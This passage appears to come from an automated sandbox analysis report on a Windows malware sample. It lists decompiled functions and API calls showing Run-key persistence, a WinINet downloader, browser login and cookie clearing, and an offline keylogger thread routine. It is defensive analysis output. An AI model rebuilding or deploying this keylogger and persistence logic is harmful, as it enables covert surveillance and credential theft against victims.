                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID: $ZA$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 111787555-1962044633
                                  • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                  • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BD9B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                  • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                  • API String ID: 2054586871-62392802
                                  • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                  • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004121E8, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                    • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                    • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                    • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                    • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                    • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                    • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                  • String ID: .exe$http\shell\open\command
                                  • API String ID: 2647146128-4091164470
                                  • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                  • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401EA2, Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00401EA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                  • String ID:
                                  • API String ID: 3851886811-0
                                  • Opcode ID: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                  • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                  • Opcode Fuzzy Hash: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                  • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412553, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103networkfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L00413EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                  0x0041255b
                                  0x00412564
                                  0x00412568
                                  0x0041256c
                                  0x00412573
                                  0x0041257a
                                  0x0041257c
                                  0x0041258d
                                  0x00412591
                                  0x00412599
                                  0x0041259c
                                  0x004125a3
                                  0x004125a6
                                  0x004125a9
                                  0x004125a9
                                  0x004125bc
                                  0x004125c4
                                  0x00000000
                                  0x00000000
                                  0x004125cd
                                  0x004125d0
                                  0x004125d1
                                  0x004125d6
                                  0x004125d8
                                  0x004125df
                                  0x004125e6
                                  0x004125ec
                                  0x004125ef
                                  0x004125fa
                                  0x00412600
                                  0x0041260a
                                  0x0041260a
                                  0x0041260c
                                  0x00412615
                                  0x0041261b
                                  0x0041261e
                                  0x0041261e
                                  0x00412622
                                  0x00412624
                                  0x0041262a
                                  0x00412632
                                  0x00412638
                                  0x00412642
                                  0x00412644
                                  0x00412648
                                  0x00412652
                                  0x00412657
                                  0x0041265f

                                  APIs
                                  • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                  • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                  • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                  • InternetCloseHandle.WININET(?), ref: 00412652
                                  • InternetCloseHandle.WININET(00000000), ref: 00412657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                  • String ID: dVA$user
                                  • API String ID: 3314639739-756348157
                                  • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                  • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004078BB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E004078BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1;
				Sleep( *0x41b9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767();
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1);
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
				return 0;
			}









                                  0x004078be
                                  0x004078cd
                                  0x004078d4
                                  0x004078d6
                                  0x004078da
                                  0x004078de
                                  0x004078e2
                                  0x004078e6
                                  0x004078e8
                                  0x004078ec
                                  0x004078ee
                                  0x004078f3
                                  0x004078f3
                                  0x004078fa
                                  0x00407901
                                  0x00407901
                                  0x00407908
                                  0x0040790f
                                  0x0040790f
                                  0x00407916
                                  0x0040791d
                                  0x0040791d
                                  0x00407922
                                  0x00407929
                                  0x00407929
                                  0x0040792f
                                  0x0040794c
                                  0x0040794c
                                  0x00407952
                                  0x00000000
                                  0x00000000
                                  0x00407954
                                  0x0040797c
                                  0x00407982
                                  0x00407992
                                  0x004079a6
                                  0x004079ac
                                  0x004079bf
                                  0x004079cf
                                  0x004079db
                                  0x004079e9
                                  0x004079f5
                                  0x004079fa
                                  0x004079fd
                                  0x00407a09

                                  APIs
                                  • Sleep.KERNEL32 ref: 004078D4
                                  • Sleep.KERNEL32(00001388), ref: 0040794C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                    • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  • [INFO], xrefs: 004079A1
                                  • Cleared browsers logins and cookies., xrefs: 0040798D
                                  • [Cleared browsers logins and cookies.], xrefs: 00407977
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                  • API String ID: 3797260644-945983296
                                  • Opcode ID: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                  • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                  • Opcode Fuzzy Hash: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                  • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405180, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E00405180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E00405156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B();
				CreateThread(0, 0, E0040528A, _t19, 0, 0);
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0);
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                  0x00405185
                                  0x00405190
                                  0x00405194
                                  0x0040519c
                                  0x004051a8
                                  0x004051ad
                                  0x004051af
                                  0x004051b9
                                  0x004051c1
                                  0x004051c1
                                  0x004051d0
                                  0x004051e4
                                  0x004051ea
                                  0x00405204
                                  0x00405208
                                  0x00405214
                                  0x00405214
                                  0x00405220
                                  0x00405225
                                  0x0040522f

                                  APIs
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                  • CreateThread.KERNEL32(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                  • CreateThread.KERNEL32(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                  • CreateThread.KERNEL32(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                  • String ID: Offline Keylogger Started$[INFO]
                                  • API String ID: 2375278975-3749928830
                                  • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
